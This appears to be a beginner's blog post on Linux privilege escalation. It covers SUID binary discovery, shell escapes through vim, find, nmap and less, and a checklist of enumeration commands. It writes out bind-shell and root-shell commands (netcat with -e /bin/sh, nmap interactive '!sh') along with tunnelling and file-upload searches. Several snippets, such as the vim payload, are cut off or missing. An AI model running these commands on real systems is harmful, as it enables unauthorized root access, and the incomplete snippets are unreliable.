This is my First blog about Linux Privilege escalation. So Without wasting any time Let’s Start I’ll start with basics. So,
/* WHAT IS LINUX AND PRIVILEGE ESCALATION? */
1. Linux -: Linux is the best-known and most-used open-source operating system. As an operating system, Linux is software that sits underneath all of the other software on a computer, receiving requests from those programs and relaying these requests to the computer’s hardware.
2. PRIVILEGE ESCALATION -: Privilege escalation is a common way for attackers to gain unauthorized access to systems within a security perimeter.
Attackers start by finding weak points in an organization’s defenses and gaining access to a system. In many cases that the first point of penetration will not grant attackers with the level of access or data they need. They will then attempt privilege escalation to gain more permissions or obtain access to additional, more sensitive systems.
/* WHY PRIVILEGE ESCALATION IS IMPORTANT ? */
While usually not the main aim of an attacker, privilege escalation is frequently used in preparation for a more specific attack, allowing intruders to deploy a malicious payload or execute malicious code in the targeted system. This means that whenever you detect or suspect privilege escalation, you also need to look for signs of other malicious activity. However, even without evidence of further attacks, any privilege escalation incident is an information security issue in itself, because someone could have gained unauthorized access to personal, confidential, or otherwise sensitive data. In many cases, this will have to be reported internally or to the relevant authorities to ensure compliance.
So here we covered some theoretical part the meaning of privilege escalation is gaining access on the root with a non-root account.
Privilege Escalation through SUID.
SUID-: setuid and setgid are Unix access rights flags that allow users to run an executable.
List of executables -:
How to Find Files with SUID Set in Linux?
$find . -perm /4000
you can add more things in this like -l(long listing).
1.VIM -: Vim is a highly configurable text editor built to enable efficient text editing. It is an improved version of the vi editor distributed with most UNIX/Linux systems. If vim is running as a suid it can access some root files.
you can access any file you can do many things like spawning shell
like this -;
2. Press ESC key
vim -c ‘:py import vim,sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
for more checkout.
find -: find is used to find files
find ***** -exec whoami \;
find software_user -exec netcat -lvp 5555 -e /bin/sh \;
netcat 192.*.*.* 5555
nmap -: Older versions of Nmap (2.02 to 5.21) had an interactive mode. and through this interactive mode, you can spawn root shell.
- nmap -V (for finding version )
- nmap –interactive
- nmap> !sh
hehe yeah it was easy
bash -: On Linux, bash is the standard shell for common users.
open a bash shell as root.
5 . less
less -: less is a command that displays file contents
important – this will not work always don’t depend on less I showed from metasploitable VM
more -: more command is used to view the text files.
the same logic of less will apply of here (more )
Some Important commands 🙂
1. What is the version?
2. Is it 64-bit or 32-bit?
3 . Finding environmental variables!
4. Any printer connected to the machine?
5. Which services are running?
shows that services which are running by root
ps aux | grep root
ps -ef | grep root
6. Wich applications are installed and versions and they’re running or not?
ls -alh /usr/bin/
ls -alh /sbin/
7. Setings of services are misconfigured or vulnerable
8. Services or jobs are scheduled?
ls -al /etc/ | grep cron
ls -al /etc/cron*
9 . Which NIC machine have ?
10. Network configuration settings
11. Tunnelling possible? Send commands locally, remotely
ssh -D 127.0.0.1:9050 -N [username]@[ip]
12. Sensitive files can be found?
ls -alh /var/mail/
13. Finding log’s
14. Shell spawn
python -c ‘import pty;pty.spawn(“/bin/bash”)’
15. How can files be uploaded?
find / -name wget
find / -name nc*
find / -name netcat*
find / -name tftp*
find / -name ftp
17. Tools/languages are installed/supported?
ind / -name perl*
find / -name python*
find / -name gcc*
find / -name cc
19. Anything “interesting” in the home directories(only if dir’s are accessible)
ls -ahlR /root/
ls -ahlR /home/
20. Whats cached? IP and/or MAC addresses
*/We covered a lot of commands now I m going to tell about the most common tool is used for priv esc.*/
LINPEAS – LinPEAS is a script that searches for possible paths to escalate privileges on Linux/Unix. i use this because it’s too good for priv esc always try to use linpeas if you have permission to read and execute
also, linENUM is a good tool
but for me mostly linpeas works.
Thanks for reading guys,